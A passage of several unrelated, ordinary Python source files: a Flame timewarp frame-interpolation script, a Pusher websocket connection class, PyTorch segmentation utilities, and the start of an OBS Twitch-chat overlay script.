([eE][+-]?[0-9]+)? # "1.2e3", "1.2e-3" or "1.2e+3"
$
""", re.VERBOSE)
lines = parsed_and_baked.readlines()
for i, line in enumerate(lines):
line = line.rstrip()
m = CORRELATION_RECORD.match(line)
if m is not None:
frame_number = int(m.group(1))
value = float(m.group(2))
tw_channel[frame_number] = value
if TW_RetimerMode == 1:
# job's done for 'Timing' channel
return tw_channel
else:
# speed - based timewarp needs a bit more love
# to solve frame values against speed channel
# with the help of anchor frames in SpeedTiming channel
tw_speed_timing = {}
TW_SpeedTiming = xml.getElementsByTagName('TW_SpeedTiming')
keys = TW_SpeedTiming[0].getElementsByTagName('Key')
for key in keys:
index = key.getAttribute('Index')
frame = key.getElementsByTagName('Frame')
if frame:
frame = (frame[0].firstChild.nodeValue)
value = key.getElementsByTagName('Value')
if value:
value = (value[0].firstChild.nodeValue)
tw_speed_timing[int(index)] = {'frame': int(frame), 'value': float(value)}
if tw_speed_timing[0]['frame'] > start:
# we need to extrapolate backwards from the first
# keyframe in SpeedTiming channel
anchor_frame_value = tw_speed_timing[0]['value']
for frame_number in range(tw_speed_timing[0]['frame'] - 1, start - 1, -1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step_back = tw_channel[min(list(tw_channel.keys()))] / 100
else:
step_back = (tw_channel[frame_number + 1] + tw_channel[frame_number]) / 200
frame_value_map[frame_number] = anchor_frame_value - step_back
anchor_frame_value = frame_value_map[frame_number]
# build up frame values between keyframes of SpeedTiming channel
for key_frame_index in range(0, len(tw_speed_timing.keys()) - 1):
# The value from my guess algorithm is close to the one in Flame but not exact,
# and the error accumulates. So the quick and dirty way is to do a forward
# and a backward pass and mix them rationally
range_start = tw_speed_timing[key_frame_index]['frame']
range_end = tw_speed_timing[key_frame_index + 1]['frame']
if range_end == range_start + 1:
# keyframes on next frames, no need to interpolate
frame_value_map[range_start] = tw_speed_timing[key_frame_index]['value']
frame_value_map[range_end] = tw_speed_timing[key_frame_index + 1]['value']
continue
forward_pass = {}
anchor_frame_value = tw_speed_timing[key_frame_index]['value']
forward_pass[range_start] = anchor_frame_value
for frame_number in range(range_start + 1, range_end):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step = tw_channel[max(list(tw_channel.keys()))] / 100
else:
step = (tw_channel[frame_number] + tw_channel[frame_number + 1]) / 200
forward_pass[frame_number] = anchor_frame_value + step
anchor_frame_value = forward_pass[frame_number]
forward_pass[range_end] = tw_speed_timing[key_frame_index + 1]['value']
backward_pass = {}
anchor_frame_value = tw_speed_timing[key_frame_index + 1]['value']
backward_pass[range_end] = anchor_frame_value
for frame_number in range(range_end - 1, range_start -1, -1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step_back = tw_channel[min(list(tw_channel.keys()))] / 100
else:
step_back = (tw_channel[frame_number + 1] + tw_channel[frame_number]) / 200
backward_pass[frame_number] = anchor_frame_value - step_back
anchor_frame_value = backward_pass[frame_number]
backward_pass[range_start] = tw_speed_timing[key_frame_index]['value']
# create easy in and out soft mixing curve
import numpy as np
from scipy import interpolate
ctr = np.array([(0, 0), (0.1, 0), (0.9, 1), (1, 1)])
x = ctr[:, 0]
y = ctr[:, 1]
interp = interpolate.CubicSpline(x, y)
work_range = list(forward_pass.keys())
ratio = 0
rstep = 1 / len(work_range)
for frame_number in sorted(work_range):
frame_value_map[frame_number] = forward_pass[frame_number] * (1 - interp(ratio)) + backward_pass[frame_number] * interp(ratio)
ratio += rstep
last_key_index = list(sorted(tw_speed_timing.keys()))[-1]
if tw_speed_timing[last_key_index]['frame'] < end:
# we need to extrapolate further on from the
# last keyframe in SpeedTiming channel
anchor_frame_value = tw_speed_timing[last_key_index]['value']
frame_value_map[tw_speed_timing[last_key_index]['frame']] = anchor_frame_value
for frame_number in range(tw_speed_timing[last_key_index]['frame'] + 1, end + 1):
if frame_number + 1 not in tw_channel.keys() or frame_number not in tw_channel.keys():
step = tw_channel[max(list(tw_channel.keys()))] / 100
else:
step = (tw_channel[frame_number] + tw_channel[frame_number + 1]) / 200
frame_value_map[frame_number] = anchor_frame_value + step
anchor_frame_value = frame_value_map[frame_number]
return frame_value_map
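# Added note: the map returned above holds, for every record frame, a possibly
# fractional source frame position; downstream the integer part picks I0/I1 and
# the fractional part becomes the interpolation ratio.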
if __name__ == '__main__':
start = time.time()
msg = 'Timewarp using FX setup from Flame\n'
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('--input', dest='input', type=str, default=None, help='folder with input sequence')
parser.add_argument('--output', dest='output', type=str, default=None, help='folder to output sequence to')
parser.add_argument('--setup', dest='setup', type=str, default=None, help='flame tw setup to use')
parser.add_argument('--record_in', dest='record_in', type=int, default=1, help='record in point relative to tw setup')
parser.add_argument('--record_out', dest='record_out', type=int, default=0, help='record out point relative to tw setup')
parser.add_argument('--model', dest='model', type=str, default='./trained_models/default/v2.0.model')
parser.add_argument('--cpu', dest='cpu', action='store_true', help='do not use GPU at all, process only on CPU')
parser.add_argument('--flow_scale', dest='flow_scale', type=float, default=1.0, help='motion analysis resolution scale')
parser.add_argument('--bit_depth', dest='bit_depth', type=int, default=16)
args = parser.parse_args()
if (args.output is None or args.input is None or args.setup is None):
parser.print_help()
sys.exit()
print('Initializing TimewarpML from Flame setup...')
img_formats = ['.exr',]
src_files_list = []
for f in os.listdir(args.input):
name, ext = os.path.splitext(f)
if ext in img_formats:
src_files_list.append(f)
input_duration = len(src_files_list)
if not input_duration:
print('not enough input frames: %s given' % input_duration)
input("Press Enter to continue...")
sys.exit()
if not args.record_out:
args.record_out = input_duration
frame_value_map = bake_flame_tw_setup(args.setup, args.record_in, args.record_out)
# input("Press Enter to continue...")
# sys.exit(0)
start_frame = 1
src_files_list.sort()
src_files = {x:os.path.join(args.input, file_path) for x, file_path in enumerate(src_files_list, start=start_frame)}
output_folder = os.path.abspath(args.output)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
output_duration = (args.record_out - args.record_in) + 1
if torch.cuda.is_available() and not args.cpu:
# Process on GPU
model = inference_common.load_model(args.model)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, output_duration))
src_start_frame = cv2.imread(src_files.get(start_frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = src_start_frame.shape
pv = max(32, int(32 / args.flow_scale))
ph = ((h - 1) // pv + 1) * pv
pw = ((w - 1) // pv + 1) * pv
padding = (0, pw - w, 0, ph - h)
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
output_frame_number = 1
for frame_number in range(args.record_in, args.record_out +1):
I0_frame_number = int(frame_value_map[frame_number])
if I0_frame_number < 1:
I0_image = cv2.imread(src_files.get(1), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
if I0_frame_number >= input_duration:
I0_image = cv2.imread(src_files.get(input_duration), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
I1_frame_number = I0_frame_number + 1
ratio = frame_value_map[frame_number] - int(frame_value_map[frame_number])
# pprint ('frame_number: %s, value: %s' % (frame_number, frame_value_map[frame_number]))
# pprint ('I0_frame_number: %s, I1_frame_number: %s, ratio: %s' % (I0_frame_number, I1_frame_number, ratio))
I0_image = cv2.imread(src_files.get(I0_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I1_image = cv2.imread(src_files.get(I1_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I0 = torch.from_numpy(np.transpose(I0_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I1 = torch.from_numpy(np.transpose(I1_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I0 = F.pad(I0, padding)
I1 = F.pad(I1, padding)
mid = make_inference_rational(model, I0, I1, ratio, scale = args.flow_scale)
mid = (((mid[0]).cpu().numpy().transpose(1, 2, 0)))
write_buffer.put((output_frame_number, mid[:h, :w]))
output_frame_number += 1
# send write loop exit code
write_buffer.put((-1, -1))
# the write loop sets IOThreadsFlag to False when it returns
while(IOThreadsFlag):
time.sleep(0.01)
else:
# Process on CPU
model = inference_common.load_model(args.model, cpu=True)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
src_start_frame = cv2.imread(src_files.get(start_frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = src_start_frame.shape
pv = max(32, int(32 / args.flow_scale))
ph = ((h - 1) // pv + 1) * pv
pw = ((w - 1) // pv + 1) * pv
padding = (0, pw - w, 0, ph - h)
device = torch.device('cpu')
torch.set_grad_enabled(False)
sim_workers, thread_ram = inference_common.safe_threads_number(h, w)
'''
max_cpu_workers = mp.cpu_count() - 2
available_ram = psutil.virtual_memory()[1]/( 1024 ** 3 )
megapixels = ( h * w ) / ( 10 ** 6 )
thread_ram = megapixels * 2.4
sim_workers = round( available_ram / thread_ram )
if sim_workers < 1:
sim_workers = 1
elif sim_workers > max_cpu_workers:
sim_workers = max_cpu_workers
print ('---\nFree RAM: %s Gb available' % '{0:.1f}'.format(available_ram))
print ('Image size: %s x %s' % ( w, h,))
print ('Peak memory usage estimation: %s Gb per CPU thread ' % '{0:.1f}'.format(thread_ram))
print ('Using %s CPU worker thread%s (of %s available)\n---' % (sim_workers, '' if sim_workers == 1 else 's', mp.cpu_count()))
if thread_ram > available_ram:
print ('Warning: estimated peak memory usage is greater than the RAM available')
'''
write_buffer = mp.Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, output_duration))
active_workers = []
output_frame_number = 1
last_thread_time = time.time()
for frame_number in range(args.record_in, args.record_out +1):
I0_frame_number = int(frame_value_map[frame_number])
if I0_frame_number < 1:
I0_image = cv2.imread(src_files.get(1), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
if I0_frame_number >= input_duration:
I0_image = cv2.imread(src_files.get(input_duration), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
write_buffer.put((output_frame_number, I0_image))
output_frame_number += 1
continue
I1_frame_number = I0_frame_number + 1
ratio = frame_value_map[frame_number] - int(frame_value_map[frame_number])
# pprint ('frame_number: %s, value: %s' % (frame_number, frame_value_map[frame_number]))
# pprint ('I0_frame_number: %s, I1_frame_number: %s, ratio: %s' % (I0_frame_number, I1_frame_number, ratio))
I0_image = cv2.imread(src_files.get(I0_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I1_image = cv2.imread(src_files.get(I1_frame_number), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
I0 = torch.from_numpy(np.transpose(I0_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I1 = torch.from_numpy(np.transpose(I1_image, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
I0 = F.pad(I0, padding)
I1 = F.pad(I1, padding)
p = mp.Process(target=make_inference_rational_cpu, args=(model, I0, I1, ratio, output_frame_number, w, h, write_buffer), kwargs = {'scale': args.flow_scale})
p.start()
active_workers.append(p)
if (time.time() - last_thread_time) < (thread_ram / 8):
if sim_workers > 1:
time.sleep(thread_ram/8)
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
output_frame_number += 1
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
# wait for all active worker threads left to finish
for p in active_workers:
p.join()
# send write loop exit code
write_buffer.put((-1, -1))
# the write loop sets IOThreadsFlag to False when it returns
while(IOThreadsFlag):
time.sleep(0.01)
for p in IOProcesses:
p.join(timeout=8)
for p in IOProcesses:
p.terminate()
p.join(timeout=0)
import hashlib
lockfile = os.path.join('locks', hashlib.sha1(output_folder.encode()).hexdigest().upper() + '.lock')
if os.path.isfile(lockfile):
os.remove(lockfile)
# input("Press Enter to continue...")
sys.exit(0)
|
connection.py
|
import sched
from threading import Thread
from collections import defaultdict
import websocket
import logging
import time
import json
class Connection(Thread):
def __init__(self, event_handler, url, reconnect_handler=None, log_level=None,
daemon=True, reconnect_interval=10, socket_kwargs=None, **thread_kwargs):
self.event_handler = event_handler
self.url = url
self.reconnect_handler = reconnect_handler or (lambda: None)
self.socket = None
self.socket_id = ""
self.event_callbacks = defaultdict(list)
self.disconnect_called = False
self.needs_reconnect = False
self.default_reconnect_interval = reconnect_interval
self.reconnect_interval = reconnect_interval
self.socket_kwargs = socket_kwargs or dict()
self.pong_timer = None
self.pong_received = False
self.pong_timeout = 30
self.bind("pusher:connection_established", self._connect_handler)
self.bind("pusher:connection_failed", self._failed_handler)
self.bind("pusher:pong", self._pong_handler)
self.bind("pusher:ping", self._ping_handler)
self.bind("pusher:error", self._pusher_error_handler)
self.state = "initialized"
self.logger = logging.getLogger(self.__module__) # create a new logger
if log_level:
self.logger.setLevel(log_level)
if log_level == logging.DEBUG:
websocket.enableTrace(True)
# From Martyn's comment at:
# https://pusher.tenderapp.com/discussions/problems/36-no-messages-received-after-1-idle-minute-heartbeat
# "We send a ping every 5 minutes in an attempt to keep connections
# alive..."
# This is why we set the connection timeout to 5 minutes, since we can
# expect a pusher heartbeat message every 5 minutes. Adding 5 sec to
# account for small timing delays which may cause messages to not be
# received in exact 5 minute intervals.
self.connection_timeout = 305
self.connection_timer = None
self.ping_interval = 120
self.ping_timer = None
self.timeout_scheduler = sched.scheduler(
time.time,
sleep_max_n(min([self.pong_timeout, self.connection_timeout, self.ping_interval]))
)
self.timeout_scheduler_thread = None
Thread.__init__(self, **thread_kwargs)
self.daemon = daemon
self.name = "PysherEventLoop"
def bind(self, event_name, callback, *args, **kwargs):
"""Bind an event to a callback
:param event_name: The name of the event to bind to.
:type event_name: str
:param callback: The callback to notify of this event.
"""
self.event_callbacks[event_name].append((callback, args, kwargs))
def disconnect(self, timeout=None):
self.needs_reconnect = False
self.disconnect_called = True
if self.socket:
self.socket.close()
self.join(timeout)
def reconnect(self, reconnect_interval=None):
if reconnect_interval is None:
reconnect_interval = self.default_reconnect_interval
self.logger.info("Connection: Reconnect in %s" % reconnect_interval)
self.reconnect_interval = reconnect_interval
self.needs_reconnect = True
if self.socket:
self.socket.close()
def run(self):
self._connect()
def _connect(self):
self.state = "connecting"
self.socket = websocket.WebSocketApp(
self.url,
on_open=self._on_open,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close
)
self.socket.run_forever(**self.socket_kwargs)
while self.needs_reconnect and not self.disconnect_called:
self.logger.info("Attempting to connect again in %s seconds."
% self.reconnect_interval)
self.state = "unavailable"
time.sleep(self.reconnect_interval)
# We need to set this flag since closing the socket will set it to
# false
self.socket.keep_running = True
self.socket.run_forever(**self.socket_kwargs)
def _on_open(self):
self.logger.info("Connection: Connection opened")
# Send a ping right away to inform that the connection is alive. If you
# don't do this, it takes a full ping interval before you can subscribe to
# channels and receive events
self.send_ping()
self._start_timers()
def _on_error(self, error):
self.logger.info("Connection: Error - %s" % error)
self.state = "failed"
self.needs_reconnect = True
def _on_message(self, message):
self.logger.info("Connection: Message - %s" % message)
# Stop our timeout timer, since we got some data
self._stop_timers()
params = self._parse(message)
if 'event' in params.keys():
if 'channel' not in params.keys():
# We've got a connection event. Lets handle it.
if params['event'] in self.event_callbacks.keys():
for func, args, kwargs in self.event_callbacks[params['event']]:
try:
func(params['data'], *args, **kwargs)
except Exception:
self.logger.exception("Callback raised an unhandled exception")
else:
self.logger.info("Connection: Unhandled event")
else:
# We've got a channel event. Lets pass it up to the pusher
# so it can be handled by the appropriate channel.
self.event_handler(
params['event'],
params['data'],
params['channel']
)
# We've handled our data, so restart our connection timeout handler
self._start_timers()
def _on_close(self, *args):
self.logger.info("Connection: Connection closed")
self.state = "disconnected"
self._stop_timers()
@staticmethod
def _parse(message):
return json.loads(message)
def _stop_timers(self):
for event in self.timeout_scheduler.queue:
self._cancel_scheduler_event(event)
def _start_timers(self):
self._stop_timers()
self.ping_timer = self.timeout_scheduler.enter(self.ping_interval, 1, self.send_ping)
self.connection_timer = self.timeout_scheduler.enter(self.connection_timeout, 2, self._connection_timed_out)
if not self.timeout_scheduler_thread:
self.timeout_scheduler_thread = Thread(target=self.timeout_scheduler.run, daemon=True, name="PysherScheduler")
self.timeout_scheduler_thread.start()
elif not self.timeout_scheduler_thread.is_alive():
self.timeout_scheduler_thread = Thread(target=self.timeout_scheduler.run, daemon=True, name="PysherScheduler")
self.timeout_scheduler_thread.start()
def _cancel_scheduler_event(self, event):
try:
self.timeout_scheduler.cancel(event)
except ValueError:
self.logger.info('Connection: Scheduling event already cancelled')
def send_event(self, event_name, data, channel_name=None):
"""Send an event to the Pusher server.
:param str event_name:
:param Any data:
:param str channel_name:
"""
event = {'event': event_name, 'data': data}
if channel_name:
event['channel'] = channel_name
self.logger.info("Connection: Sending event - %s" % event)
try:
self.socket.send(json.dumps(event))
except Exception as e:
self.logger.error("Failed to send event: %s" % e)
def send_ping(self):
self.logger.info("Connection: ping to pusher")
try:
self.socket.send(json.dumps({'event': 'pusher:ping', 'data': ''}))
except Exception as e:
self.logger.error("Failed to send ping: %s" % e)
self.pong_timer = self.timeout_scheduler.enter(self.pong_timeout, 3, self._check_pong)
def send_pong(self):
self.logger.info("Connection: pong to pusher")
try:
self.socket.send(json.dumps({'event': 'pusher:pong', 'data': ''}))
except Exception as e:
self.logger.error("Failed to send pong: %s" % e)
def _check_pong(self):
self._cancel_scheduler_event(self.pong_timer)
if self.pong_received:
self.pong_received = False
else:
self.logger.info("Did not receive pong in time. Will attempt to reconnect.")
self.state = "failed"
self.reconnect()
def _connect_handler(self, data):
parsed = json.loads(data)
self.socket_id = parsed['socket_id']
self.state = "connected"
if self.needs_reconnect:
# Since we've opened a connection, we don't need to try to reconnect
self.needs_reconnect = False
self.reconnect_handler()
self.logger.debug('Connection: Established reconnection')
else:
self.logger.debug('Connection: Established first connection')
def _failed_handler(self, data):
self.state = "failed"
def _ping_handler(self, data):
self.send_pong()
# Restart our timers since we received something on the connection
self._start_timers()
def _pong_handler(self, data):
self.logger.info("Connection: pong from pusher")
self.pong_received = True
def _pusher_error_handler(self, data):
if 'code' in data:
try:
error_code = int(data['code'])
except (TypeError, ValueError):
error_code = None
if error_code is not None:
self.logger.error("Connection: Received error %s" % error_code)
if (error_code >= 4000) and (error_code <= 4099):
# The connection SHOULD NOT be re-established unchanged
self.logger.info("Connection: Error is unrecoverable. Disconnecting")
self.disconnect()
elif (error_code >= 4100) and (error_code <= 4199):
# The connection SHOULD be re-established after backing off
self.reconnect()
elif (error_code >= 4200) and (error_code <= 4299):
# The connection SHOULD be re-established immediately
self.reconnect(0)
else:
pass
else:
self.logger.error("Connection: Unknown error code")
else:
self.logger.error("Connection: No error code supplied")
def _connection_timed_out(self):
self.logger.info("Did not receive any data in time. Reconnecting.")
self.state = "failed"
self.reconnect()
def sleep_max_n(max_sleep_time):
def sleep(time_to_sleep):
time.sleep(min(max_sleep_time, time_to_sleep))
return sleep
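# Minimal usage sketch (illustrative only; the URL and app key are placeholders,
# not part of this module):
#
#   def on_event(event, data, channel):
#       print(channel, event, data)
#
#   conn = Connection(on_event, "wss://ws.pusherapp.com/app/<APP_KEY>?protocol=7")
#   conn.bind("pusher:connection_established", lambda data: print("connected", data))
#   conn.start()  # Connection is a Thread; run() opens the websocket loop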
|
utils.py
|
import numpy as np
import math
import os
from os.path import exists, join, split
from PIL import Image
import torch
import shutil
import threading
from torch import nn
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n=19):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
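# Added note: fast_hist accumulates an n x n confusion matrix where entry (i, j)
# counts pixels with ground-truth label i predicted as class j; per_class_iu then
# returns per-class intersection-over-union, diag / (row_sum + col_sum - diag).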
def save_output_images(predictions, filenames, output_dir):
"""
Saves each prediction of a (B x H x W) batch as its own .png image file
under output_dir, creating sub-directories as needed.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves each prediction of a (B x H x W) batch as a colorized .png image file
under output_dir, using the given palette.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class MaskedMSE(nn.Module):
def __init__(self):
super(MaskedMSE, self).__init__()
self.criterion = nn.MSELoss()
def forward(self, input, target, mask_a, mask_b):
self.loss = self.criterion(input * mask_a, target * mask_b)
return self.loss
def to_np(x):
return x.cpu().numpy()
def accuracy(output, target):
"""Computes pixel-wise classification accuracy, ignoring pixels labelled 255"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def accuracy_depth(output, target, mask):
"""Computes pixel-wise accuracy over the region selected by mask"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = torch.masked_select(pred, mask.byte())
target = torch.masked_select(target, mask.byte())
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
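# Added note: fill_up_weights initialises an upsampling (transposed) convolution
# with bilinear interpolation weights; every output channel reuses the same
# 2-D kernel built for channel 0.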
def fill_conv_weights(m):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
|
chat.py
|
#!/usr/bin/python3
"""
The MIT License (MIT)
Copyright (c) 2020 WesleyCSJ - wesleyjr10@gmail.com
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import obspython as obs
import socket
import threading
import re
HOST = "irc.chat.twitch.tv" # The remote host
PINGPONG_SERVER = ":tmi.twitch.tv"
PORT = 6667 # The same port as used by the server
STOP_SIGNAL = False
SOCKET = None
# RESOURCES OF COLUMN AND LINE SIZE
TEXTSOURCE_BUFFER = []
CONNECTBUTTON_RESOURCE = None
COLUMN_RESOURCE = None
COLUMN_VALUE = 1
LINE_RESOURCE = None
LINE_VALUE = 1
OAUTH_RESOURCE = None
OAUTH_VALUE = ""
USERNAME_RESOURCE = None
USERNAME_VALUE = ""
CHANNEL_RESOURCE = None
CHANNEL_VALUE = ""
TEXTSOURCE_VALUE = ""
def socket_connect(property, obj):
global SOCKET
try:
SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SOCKET.connect((HOST, PORT))
SOCKET.send(bytes("PASS {}\r\n".format (OAUTH_KEY), "UTF-8"))
SOCKET.send(bytes("NICK {}\r\n".format (USERNAME_VALUE) , "UTF-8"))
SOCKET.send(bytes("JOIN #{}\r\n".format(CHANNEL_VALUE) , "UTF-8"))
start_thread()
except OSError:
print("OSError: Transport endpoint not connected")
except ConnectionRefusedError:
print("ConnectionRefusedError: Could not connect to Node.js server.")
def start_thread():
print("Starting Thread")
global STOP_SIGNAL
STOP_SIGNAL = True
try:
RECEIVE_THREAD.start()
except:
print("ERROR: Could not start the chat service.")
def thread_data(name):
source = obs.obs_get_source_by_name(TEXTSOURCE_VALUE)
button = obs.obs_get_source_by_name("btn_connect")
print("Started the chat service.")
while STOP_SIGNAL:
data = None
try:
data = SOCKET.recv(1024).decode("utf-8")
if not data:
break
except:
print("ERROR: Invalid data received; unable to parse.")
break
#Parses the IRC line and returns a dictionary with the command
content = parse_message(data)
if content['command'] is not None:
if content['command'] == "PING":
SOCKET.sendall(bytes("PONG {}\r\n".format(PINGPONG_SERVER),"UTF-8"))
elif content['command'] == "PRIVMSG":
append_buffer(source, "{}: {}".format(content['username'], content['message']))
obs.obs_source_release(source)
print("Stopping the chat service.")
RECEIVE_THREAD = threading.Thread(target=thread_data, args=(1,))
def parse_message(data):
commandDict = dict()
msgRAW = data.strip()
if (msgRAW == "PING {}".format(PINGPONG_SERVER)):
commandDict["command"] = "PING"
return commandDict
msgCommand = msgRAW.split(":")[1].split(" ")[1]
msgContent = msgRAW.split(":")[2]
if msgCommand == "PRIVMSG":
username = msgRAW.split(":")[1].split(" ")[0].split("!")[0]
username = "@{}".format(username)
commandDict[ "command" ] = "PRIVMSG"
commandDict[ "username"] = username
commandDict[ "message" ] = msgContent
else:
commandDict["command"] = None
return commandDict
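# Illustrative example: a raw line such as
#   ":nick!nick@nick.tmi.twitch.tv PRIVMSG #channel :hello"
# parses to {'command': 'PRIVMSG', 'username': '@nick', 'message': 'hello'}.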
def append_buffer(source, data):
textData = data
lineBuffer = ""
if (len(textData) <= COLUMN_SIZE):
append_fixedSizeText(TEXTSOURCE_BUFFER, textData)
else:
iterations = int(len(textData) / COLUMN_SIZE)
odd_slices = (len(textData) % COLUMN_SIZE) != 0
for i in range(0, iterations):
firstPos = (i * COLUMN_SIZE)
lastPos = (firstPos + COLUMN_SIZE)
slicedLine = textData[firstPos:lastPos]
append_fixedSizeText(TEXTSOURCE_BUFFER, slicedLine)
if (odd_slices):
firstPos = (iterations * COLUMN_SIZE)
append_fixedSizeText(TEXTSOURCE_BUFFER, textData[firstPos:])
while (len(TEXTSOURCE_BUFFER) > LINE_SIZE):
TEXTSOURCE_BUFFER.pop(0)
render_textSource(source)
def append_fixedSizeText(array, data):
fixedData = data.lstrip()
if (len(fixedData) < COLUMN_SIZE):
